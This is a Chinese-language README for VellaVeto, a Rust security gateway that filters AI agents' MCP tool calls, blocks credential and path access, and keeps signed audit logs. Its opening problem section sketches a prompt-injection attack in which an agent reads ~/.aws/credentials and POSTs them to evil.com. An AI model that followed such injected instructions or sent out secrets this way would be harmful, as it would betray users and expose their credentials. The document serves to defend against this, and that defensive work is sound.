vellaveto/vellaveto

**VellaVeto 是一个用于 AI agent 工具调用的运行时安全引擎。** 它拦截 [MCP](https://modelcontextprotocol.io/) 和函数调用请求，对路径、域和操作执行安全策略，并维护防篡改的审计追踪。你可以将其部署为 stdio 代理、HTTP 网关、多租户控制平面或客户端隐私盾。 ## 问题背景 AI agent 可以读取文件、发起 HTTP 请求和执行命令。如果没有集中控制： ``` Agent receives prompt injection → reads ~/.aws/credentials → POST https://evil.com/exfil?data=AKIA... → no audit trail, no one notices ``` 这并非假设。MCP 生态系统在 15 个月内已累计 [30+ CVEs](https://www.practical-devsecops.com/mcp-security-vulnerabilities/)：`mcp-remote` 中的命令注入（[CVE-2025-6514](https://nvd.nist.gov/vuln/detail/CVE-2025-6514)）、Anthropic 官方 Git MCP server 中的路径遍历（[CVE-2025-68143/44/45](https://github.com/anthropics/anthropic-cookbook/security/advisories)）、[SANDWORM](docs/THREAT_MODEL.md) npm 供应链蠕虫向 AI 配置中注入恶意 MCP server，以及作为 MCP 包分发的 [SmartLoader](https://blog.morphisec.com/smartloader-malware-targets-manufacturing) 木马。已发现 [8,000+ MCP servers](https://invariantlabs.ai/blog/mcp-security-notification-tool-poisoning-attacks) 在无认证情况下暴露。 VellaVeto 位于 AI agent 和工具服务器之间。每个工具调用在执行前都会根据策略进行评估。若无匹配策略、缺少上下文或评估出错，结果均为 `Deny`。每个决策都记录在防篡改链中。 ``` Agent attempts: read_file("/home/user/.aws/credentials") → VellaVeto evaluates against policy → Deny { reason: "path blocked by credential-protection rule" } → Logged with SHA-256 chain + Ed25519 checkpoint → Agent never sees the file contents ``` ## Consumer Shield —— 保护用户免受 AI 提供商侵害 企业安全只是故事的一半。当 AI 提供商通过其基础设施处理工具调用时，它们能看到你的文件路径、凭证、浏览模式和工作上下文。[Consumer Shield](examples/presets/consumer-shield.toml) 是一种用户侧部署模式，旨在保护个人免受大规模数据收集 —— 无论提供商的服务条款如何规定。 ``` You type: "Read my medical records at /home/alice/health/lab-results.pdf" → Shield intercepts before the provider sees it → PII replaced: "Read my medical records at [PII_PATH_1]" → Provider processes the sanitized request → Response comes back, Shield restores original paths → Encrypted local audit proves what was shared and what was stripped ``` **Shield 的功能：** | 层级 | 保护内容 | 机制 | |---|---|---| | **PII 脱敏** | 文件路径、邮箱、IP、姓名、凭证 | 使用 `[PII_{CAT}_{SEQ}]` 占位符双向替换 —— 提供商永远看不到原始内容 | | **加密本地审计** | 完整交互历史 | XChaCha20-Poly1305 + Argon2id，存储在你的机器上，而非提供商处 | | **会话隔离** | 跨会话关联 | 每个会话获得新凭证 —— 提供商无法关联会话以建立档案 | | **凭证库** | 通过工具调用传递的 API key、token | 盲凭证绑定 —— 提供商看到工具调用但看不到凭证值 | | **文风抗性** | 写作风格指纹识别 | 空格、标点、emoji 和填充词归一化，使你的写作模式无法被识别 | | ** Canary 警示** | 法律强制透明度 | Ed25519 签名的 canary —— 如果停止更新，假定存在法律压力 | Shield 以 `vellaveto-shield` 名称在本地运行，采用 **MPL-2.0** 许可 —— 无需企业许可证。 ``` vellaveto-shield --config consumer-shield.toml -- npx @anthropic/claude-desktop ``` ## 功能概览 VellaVeto 不仅仅是代理或防火墙 —— 它是 agentic 系统的安全控制平面： - **策略引擎** —— glob/regex/domain 匹配、参数约束、时间窗口、调用限制、Cedar 风格 ABAC、Wasm 插件。<5ms P99 评估。 - **威胁检测** —— 注入、tool squatting、rug pulls、schema 投毒、DLP、memory 投毒、多 agent 串通。20+ 检测层，不只是 regex。 - **身份与访问** —— OAuth 2.1/JWT、OIDC/SAML、RBAC、能力委派、DPoP (RFC 9449)、非人类身份生命周期。 - **拓扑发现** —— 自动发现 MCP servers、tools 和 resources。检测 drift、tool shadowing 和命名空间冲突。 - **审计与合规** —— 防篡改日志（SHA-256 + Merkle + Ed25519）、ZK 证明、证据包映射到 EU AI Act、SOC 2、DORA、NIS2、NIST AI 600-1、ISO 42001 及另外 6 个框架。 - **Consumer shield** —— 上述所有功能，在用户侧运行。参见 [Consumer Shield](#consumer-shield--protect-users-from-ai-providers)。 **核心保证：** - **完全仲裁** —— 请求和响应路径在工具执行前和模型返回前进行评估 - **Fail-closed** —— 错误、缺少策略和未解决的上下文均产生 `Deny` - **防篡改审计** —— SHA-256 哈希链 + Merkle 证明 + Ed25519 签名检查点 - **公开安全契约** —— [Security Guarantees](docs/SECURITY_GUARANTEES.md) + [Assurance Case](docs/ASSURANCE_CASE.md) 附带可复现证据 ## 快速开始 ### 即时保护 选择一个保护级别即可 —— 无需配置文件： ``` # 安装（任选其一）： cargo install vellaveto-proxy # From source (~2 min) # 或从 https://github.com/vellaveto/vellaveto/releases 下载预构建的二进制文件 # Shield — 凭证、SANDWORM 防御、窃密阻断、注入/DLP vellaveto-proxy --protect shield -- npx @modelcontextprotocol/server-filesystem /tmp # Fortress — shield + 系统文件、软件包配置、sudo 审批、内存追踪 vellaveto-proxy --protect fortress -- python -m mcp_server # Vault — 默认拒绝、允许安全读取、写入需审批 vellaveto-proxy --protect vault -- ./my-server ``` | 级别 | 默认值 | 阻止内容 | 适用对象 | |-------|---------|----------------|----------| | `shield` | Allow | 凭证、SANDWORM（AI 配置注入）、exfil 域、git hooks、系统文件、危险命令、注入、DLP | 任何人 —— 开箱即用 | | `fortress` | Allow | Shield + 包配置篡改、权限提升审批、memory 投毒检测、shadow agent 检测 | 想要更多保护的开发者 | | `vault` | **Deny** | 除明确允许外的所有内容；源代码读取 + git 读取允许，写入需要审批 | 最高安全性 |

### 设置向导 ``` npx create-vellaveto ``` ### 自定义配置 ``` vellaveto-proxy --config policy.toml -- /path/to/mcp-server ``` ### HTTP 反向代理（已部署的 MCP servers） ``` cargo install vellaveto-http-proxy VELLAVETO_API_KEY=$(openssl rand -hex 32) vellaveto-http-proxy \ --upstream http://localhost:8000/mcp \ --config policy.toml \ --listen 127.0.0.1:3001 ``` ### Docker ``` docker pull ghcr.io/vellaveto/vellaveto:latest docker run -p 3000:3000 \ -v /path/to/config.toml:/etc/vellaveto/config.toml:ro \ ghcr.io/vellaveto/vellaveto:latest ``` ### 配合 Claude Desktop 使用 编辑 `~/Library/Application Support/Claude/claude_desktop_config.json` (macOS) 或 `%APPDATA%\Claude\claude_desktop_config.json` (Windows)： ``` { "mcpServers": { "filesystem": { "command": "vellaveto-proxy", "args": [ "--protect", "shield", "--", "npx", "-y", "@modelcontextprotocol/server-filesystem", "/home/user/projects" ] } } } ``` ### 配合 Cursor 使用 编辑项目目录中的 `.cursor/mcp.json`： ``` { "mcpServers": { "filesystem": { "command": "vellaveto-proxy", "args": [ "--protect", "fortress", "--", "npx", "-y", "@modelcontextprotocol/server-filesystem", "." ] } } } ``` ### 配合 Windsurf 使用 编辑 `~/.codeium/windsurf/mcp_config.json`： ``` { "mcpServers": { "filesystem": { "command": "vellaveto-proxy", "args": [ "--protect", "fortress", "--", "npx", "-y", "@modelcontextprotocol/server-filesystem", "." ] } } } ``` 将 `shield`/`fortress` 替换为 `vault` 以获得最高安全性。SDK 集成指南（Anthropic、OpenAI、LangChain、LangGraph、CrewAI）请参见 [docs/QUICKSTART.md](docs/QUICKSTART.md)。 ## 工作原理 ``` +------------------+ AI Agent -------->| VellaVeto |--------> Tool Server | | | 1. Parse action | | 2. Match policy | | 3. Evaluate | | constraints | | 4. Allow / Deny | | 5. Audit log | +--------+---------+ | Tamper-evident log (SHA-256 chain + Ed25519 signatures) ``` ## 架构 ``` graph TD subgraph "Policy Core" VT[vellaveto-types] --> VCfg[vellaveto-config] VT --> VCan[vellaveto-canonical] VT --> VE[vellaveto-engine] VT --> VDisc[vellaveto-discovery] VE --> VA[vellaveto-audit] VE --> VAppr[vellaveto-approval] end subgraph "Gateway & Control Plane" VA --> VMCP[vellaveto-mcp] VCfg --> VP[vellaveto-proxy] VMCP --> VP VMCP --> VHP[vellaveto-http-proxy] VMCP --> VServer[vellaveto-server] VCfg --> VCluster[vellaveto-cluster] VCluster --> VOp[vellaveto-operator] end subgraph "Consumer & Ecosystem" VS[vellaveto-shield] --> MS[vellaveto-mcp-shield] VS --> HS[vellaveto-http-proxy-shield] VS --> VC[vellaveto-canary] MCPSEC[mcpsec] end MS --> VMCP HS --> VHP VC --> VA ``` 底层 crate 不依赖高层 crate。`vellaveto-operator` 是独立的（kube-rs，无内部依赖）。许可证层级在 [LICENSING.md](LICENSING.md) 中单独说明。 ## 核心能力 | | 功能 | 文档 | |---|---|---| | **策略引擎** | Glob/regex/domain 匹配、参数约束、时间窗口、调用限制、动作序列、Cedar 风格 ABAC、Wasm 插件。预编译模式，<5ms P99，决策缓存。 | [Policy](docs/POLICY.md) | | **威胁检测** | 20+ 检测层：注入（Aho-Corasick + NFKC + 混淆解码）、tool squatting、rug pulls、schema 投毒、DLP、memory 投毒、多 agent 串通。映射到 [OWASP Agentic Top 10](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)。 | [Threat Model](docs/THREAT_MODEL.md) | | **身份与访问** | OAuth 2.1/JWT、OIDC/SAML、RBAC（4 角色，14 权限）、带 forbid-overrides 的 ABAC、能力委派、DPoP (RFC 9449)、非人类身份生命周期。 | [IAM](docs/IAM.md) | | **发现** | 通过拓扑图自动发现 MCP servers、tools、resources。检测 drift、tool shadowing、命名空间冲突。拓扑守卫作为策略前过滤器。 | [Architecture](#architecture) | | **审计与合规** | 防篡改日志（SHA-256 + Merkle + Ed25519）、ZK 证明（Pedersen + Groth16）、EU AI Act、SOC 2、DORA、NIS2、NIST AI 600-1、ISO 42001 及另外 6 个框架的证据包。 | [Compliance](docs/COMPLIANCE.md) | | **Consumer Shield** | 用户侧 PII 脱敏、加密本地审计（XChaCha20-Poly1305）、会话隔离、凭证库、文风指纹抗性、warrant canary。 | [Consumer Shield](examples/presets/consumer-shield.toml) | | **部署** | 6 种模式：HTTP、stdio、WebSocket、gRPC、gateway、consumer shield。K8s operator（3 CRDs）、Helm chart、Terraform provider、VS Code 扩展。 | [Deployment](docs/DEPLOYMENT.md) | ## 安全性 ### 内部对抗审计 VellaVeto 经过了 **232 轮内部对抗安全审计**，涵盖映射到 [OWASP Top 10 for Agentic Applications](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/) 的 31+ 攻击类别。这些不是第三方审计 —— 它们是系统的内部红队演练，我们攻击自己的代码、记录发现、修复它们并验证修复。已解决 1,550+ 发现。方法和发现记录在 [changelog](CHANGELOG.md) 和 [security review](docs/SECURITY_REVIEW.md) 中。 - **全局 Fail-closed** —— 空策略集、缺少参数、锁投毒、容量耗尽和评估错误均产生 `Deny` - **库代码中零 `unwrap()`** —— 所有错误路径返回类型化错误；panic 仅保留给测试 - **9,900+ 测试** —— Rust、Python、Go、TypeScript、Java、Terraform、React、VS Code + 24 个 fuzz 目标，零警告 - **后量子就绪** —— 混合 Ed25519 + ML-DSA-65 (FIPS 204) 审计签名，通过 `pqc-hybrid` feature gate 启用 ### 形式化验证 我们使用形式化方法来证明 —— 而非仅仅测试 —— 关键安全属性： | 工具 | 已证明内容 | 文件 | |---|---|---| | **TLA+** | 策略引擎确定性、ABAC forbid-override 正确性、工作流约束执行、任务生命周期安全、级联故障恢复 | [formal/tla/](formal/tla/) | | **Lean 4** | Fail-closed 属性（错误 → Deny）、评估确定性、路径规范化幂等性 | [formal/lean/](formal/lean/) | | **Coq** | 15 个定理：fail-closed、确定性、ABAC forbid-override、能力委派衰减 | [formal/coq/](formal/coq/) | | **Alloy** | 能力委派无法提升权限 | [formal/alloy/](formal/alloy/) | | **Kani** | 5 个用于有界模型检查的证明规范（需要 `cargo kani`） | [formal/kani/](formal/kani/) | 形式化验证在安全工具中很少见。我们认为最重要的属性 —— fail-closed 行为、确定性、无权限提升 —— 应该被证明而非仅被测试。详情参见 [formal/README.md](formal/README.md)。 ### 已知局限性 注入检测是预过滤器，而非安全边界。DLP 无法检测跨多次调用的分割凭证。无 TLS 终止（请使用反向代理）。内部审计流程虽然详尽，但不能替代独立的第三方审查。完整规范契约参见 [Security Guarantees](docs/SECURITY_GUARANTEES.md)。 完整详情：[Security Guarantees](docs/SECURITY_GUARANTEES.md) | [Threat Model](docs/THREAT_MODEL.md) | [Assurance Case](docs/ASSURANCE_CASE.md) ### MCPSEC 基准 我们构建了 [MCPSEC](mcpsec/)，一个针对 MCP gateway 的开放、供应商中立的安全基准（Apache-2.0）。它定义了 10 个形式化安全属性和跨 12 个攻击类别的 64 个可复现攻击测试用例。VellaVeto v6.0.0 得分为 **100/100（Tier 5: Hardened）** —— 全部 64 项测试通过。针对任何 MCP gateway 运行 —— 包括我们自己的： ``` cargo run -p mcpsec -- --target http://localhost:3000 --format markdown ``` 属性、攻击类别和方法论参见 [mcpsec/README.md](mcpsec/README.md)。 ### 合规与监管框架 VellaVeto 将运行时安全控制映射到 **12 个监管和行业框架** —— 唯一内置合规证据生成的 MCP gateway。每个框架都有专用的 Rust 注册表，将 VellaVeto 能力映射到具体条款、条文或控制项，并为受监管框架提供覆盖率报告和证据包。 **监管类：** EU AI ActArt 9/10/12/14/50）、NIS2（Art 21-23，含 24h/72h/1M 事件时间线）、DORA（Ch II/III/V，用于金融 ICT 韧性）、ISO 42001（AI 管理体系） **信任与认证：** SOC 2 Type II（CC1-CC9，含自动化 CC6 访问审查）、NIST AI 600-1（12 个 GenAI 风险领域） **威胁与安全：** OWASP Top 10 Agentic（ASI01-ASI10）、OWASP MCP Top 10（MCP01-MCP10）、CoSAI（38/38 控制项）、Adversa TOP 25（25/25）、CSA Agentic Trust Framework、Singapore MGF **跨法规事件报告** 将单一安全事件映射到每个适用框架的通知时间线（NIS2 24h 预通知、DORA 分类、EU AI Act Art 62 义务）。**10 框架差距分析** 提供整合的覆盖率报告和优先级排序的补救指导。 完整详情：[Compliance Guide](docs/COMPLIANCE.md) | [Website: vellaveto.online/compliance](https://www.vellaveto.online/compliance) ## 对比分析 | | **VellaVeto** | **AgentGateway** | **MCP-Scan (Snyk)** | **Lasso Gateway** | |---|---|---|---|---| | **语言** | Rust | Rust | Python | Python | | **支持方** | 独立 | Linux Foundation / Solo.io | Snyk（收购 Invariant Labs） | Lasso Security（融资约 $28M） | | **Stars** | 新项目 | ~1,800 | ~1,700 | ~349 | | **主要角色** | 运行时策略引擎 + 防火墙 | 连接代理 / gateway | 扫描器 + 监控器 | 安全网关（基于插件） | | **评估延迟** | <5ms P99 | 未公布 | 不适用（扫描时） | 未公布 | | **策略引擎** | Glob/regex/domain、ABAC、Cedar、Wasm 插件、时间窗口、调用序列 | OPA / OpenFGA / CEL | Guardrailing 策略 | 基于插件的 guardrails | | **注入检测** | 20+ 层（Aho-Corasick、NFKC、ROT13、base64、数学符号、leetspeak、emoji 走私、FlipAttack、memory 投毒、schema 投毒...） | AI Prompt Guard（基于 LLM） | 工具描述扫描 + LLM judges | Guardrail 插件 | | **DLP** | 5 层解码 + 凭证模式 | PII 模式掩码 | 密钥扫描 | Presidio 插件 | | **传输覆盖** | HTTP、WebSocket、gRPC、stdio、SSE（验证对等） | MCP + A2A | MCP（stdio + proxy） | MCP（stdio、SSE） | | **审计追踪** | SHA-256 链 + Merkle + Ed25519 + ZK 证明 + PostgreSQL | 可观测性钩子 | 日志 | 日志 | | **合规** | 12 个框架（EU AI Act、SOC 2、DORA、NIS2...） | 无 | 无 | 无 | | **形式化验证** | TLA+、Lean 4、Coq、Alloy、Kani | 无 | 无 | 无 | | **消费者隐私** | PII 脱敏、会话隔离、凭证库、文风抗性 | 无 | 无 | PII 扫描 | | **企业 IAM** | OIDC、SAML、RBAC、SCIM、DPoP | 无 | 无 | 无 | | **MCPSEC 得分** | 100/100（Tier 5） | 未测试 | 不适用 | 未测试 | | **设置便捷性** | `--protect shield`（单标志）/ Docker / Helm | Docker / binary | `pip install` | `pip install` | | **许可证** | MPL-2.0 / Apache-2.0 / BUSL-1.1 | Apache-2.0 | Apache-2.0 | MIT | **权衡：** AgentGateway 和 MCP-Scan 拥有强大的机构支持（Linux Foundation、Snyk）和更大的社区。AgentGateway 在连接性和可观测性层以及外部策略引擎集成（OPA、OpenFGA）方面表现出色；MCP-Scan 在扫描 MCP server 配置方面表现出色，现在包含运行时代理模式。两者都有可靠的安全功能。Lasso Gateway 和 [PipeLock](https://github.com/luckyPipewrench/pipelock)（Go、单二进制）在范围上更接近，但深度较浅。VellaVeto 的差异化在于集成策略评估（<5ms P99）、多传输对等性、合规证据和形式化验证 —— 上表是我们诚实的最佳努力比较，但我们鼓励你根据自己的需求评估每个工具。 ## 部署模式 | 模式 | 命令 | 用例 | |---|---|---| | HTTP API Server | `vellaveto serve` | Dashboard、REST API、策略管理 | | MCP Stdio Proxy | `vellaveto-proxy` | Claude Desktop、本地 MCP servers | | HTTP Reverse Proxy | `vellaveto-http-proxy` | 已部署的 MCP servers、SSE/Streamable HTTP | | WebSocket Proxy | `vellaveto-http-proxy` | `/mcp/ws` 上的双向 MCP-over-WS | | gRPC Proxy | `vellaveto-http-proxy --grpc` | 高吞吐量、protobuf 原生（feature-gated） | | Consumer Shield | `vellaveto-shield` | 用户侧 PII 保护 | 配置详情参见 [docs/DEPLOYMENT.md](docs/DEPLOYMENT.md)。 ## 文档 ### 入门 | 文档 | 描述 | |---|---| | [Quick Start](docs/QUICKSTART.md) | 框架集成指南（Anthropic、OpenAI、LangChain、LangGraph、MCP） | | [15-Minute Secure Start](docs/SECURE_QUICKSTART_15_MIN.md) | 端到端 deny-by-default 演示及审计验证 | | [Policy Configuration](docs/POLICY.md) | 策略语法、操作符、预设、elicitation、采样、DLP | | [CLI Reference](docs/CLI.md) | 所有二进制文件和命令 | | [Environment Variables](docs/ENV.md) | 通过环境变量配置 | ### 安全与合规 | 文档 | 描述 | |---|---| | [Security Guarantees](docs/SECURITY_GUARANTEES.md) | 规范的、可证伪的安全契约 | | [Threat Model](docs/THREAT_MODEL.md) | 信任边界、攻击面、缓解措施 | | [Assurance Case](docs/ASSURANCE_CASE.md) | 声明 -> 证据 -> 复现映射 | | [Security Hardening](docs/SECURITY.md) | 安全配置最佳实践 | | [Quantum Migration](docs/quantum-migration.md) | PQC 推出和回滚门控 | ### 运维与架构 | 文档 | 描述 | |---|---| | [Deployment Guide](docs/DEPLOYMENT.md) | Docker、Kubernetes（Helm）、裸金属 | | [Operations Runbook](docs/OPERATIONS.md) | 监控、故障排查、维护 | | [API Reference](docs/API.md) | 完整 HTTP API（168 个端点） | | [Audit Log](docs/AUDIT_LOG.md) | 审计系统内部机制、验证、SIEM 导出 | | [IAM](docs/IAM.md) | OIDC、SAML、RBAC、会话管理 | | [Benchmarks](docs/BENCHMARKS.md) | 可复现的性能基准 | | [Evaluation Traces](docs/EVALUATION_TRACES.md) | 决策可解释性和执行图 | ### SDK | SDK | 路径 | 测试 | |---|---|---| | Python（sync + async、LangChain、LangGraph、CrewAI、Google ADK、OpenAI Agents、Composio、Claude Agent、Strands、MS Agents） | [sdk/python/](sdk/python/) | 484 | | TypeScript | [sdk/typescript/](sdk/typescript/) | 122 | | Go | [sdk/go/](sdk/go/) | 129 | | Java | [sdk/java/](sdk/java/) | 120 | ## 开发 ``` # 构建 cargo build --release # 测试 cargo test --workspace # Lint cargo clippy --workspace --all-targets # 格式化 cargo fmt --check # 安全审计 cargo audit # Benchmarks cargo bench --workspace # Fuzz（需要 nightly） cd fuzz && cargo +nightly fuzz run fuzz_json_rpc_framing -- -max_total_time=60 ``` 开发规则和提交格式参见 [CONTRIBUTING.md](CONTRIBUTING.md)。 ### CI 策略验证 在 GitHub Actions 中验证你的策略配置： ``` - uses: vellaveto/vellaveto/.github/actions/policy-check@main with: config: vellaveto.toml strict: true ``` ## 许可证 | 层级 | 许可证 | Crates | |---|---|---| | Core + Consumer | MPL-2.0 | types、engine、audit、config、canonical、discovery、approval、proxy、mcp-shield、shield | | Canary + Benchmark | Apache-2.0 | canary、mcpsec | | Enterprise | BUSL-1.1 → MPL-2.0 | server、http-proxy、mcp、cluster、operator、integration | Enterprise crates 在生产环境中可免费使用（≤3 节点 / ≤25 端点）。每个版本在 3 年后转换为 MPL-2.0。完整详情参见 [LICENSING.md](LICENSING.md)。如需托管服务或超出阈值的部署，请联系 **hello@vellaveto.online**。 ## 参考资料 - [MCP Specification 2025-11-25](https://modelcontextprotocol.io/specification/2025-11-25) - [OWASP Top 10 for Agentic Applications 2026](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/) - [OWASP Top 10 for MCP Servers](https://owasp.org/www-project-top-10-for-mcp-servers/) - [CoSAI MCP Security Whitepaper](https://www.coalitionforsafeai.org/) - [ETDI: Mitigating Tool Squatting and Rug Pull Attacks in MCP](https://arxiv.org/abs/2506.01333) - [Enterprise-Grade Security for MCP](https://arxiv.org/pdf/2504.08623) - [MCP Security Vulnerabilities — Practical DevSecOps](https://www.practical-devsecops.com/mcp-security-vulnerabilities/)

标签：Agentic AI, AI基础设施, AI安全, AI应用防火墙, AMSI绕过, API集成, Chat Copilot, CISA项目, DLL 劫持, DLP, DNS 反向解析, JSONLines, LLM, MCP, OWASP Top 10, Rust, Streamlit, Unmanaged PE, WAF, 代理安全, 代理网关, 可观测性, 可视化界面, 大语言模型, 威胁检测, 子域名突变, 安全网关, 工具调用防护, 形式化验证, 提示词注入防护, 数据防泄露, 模型上下文协议, 网络安全, 网络流量审计, 访问控制, 请求拦截, 通知系统, 通知系统, 防火墙, 隐私保护, 零信任, 高速代理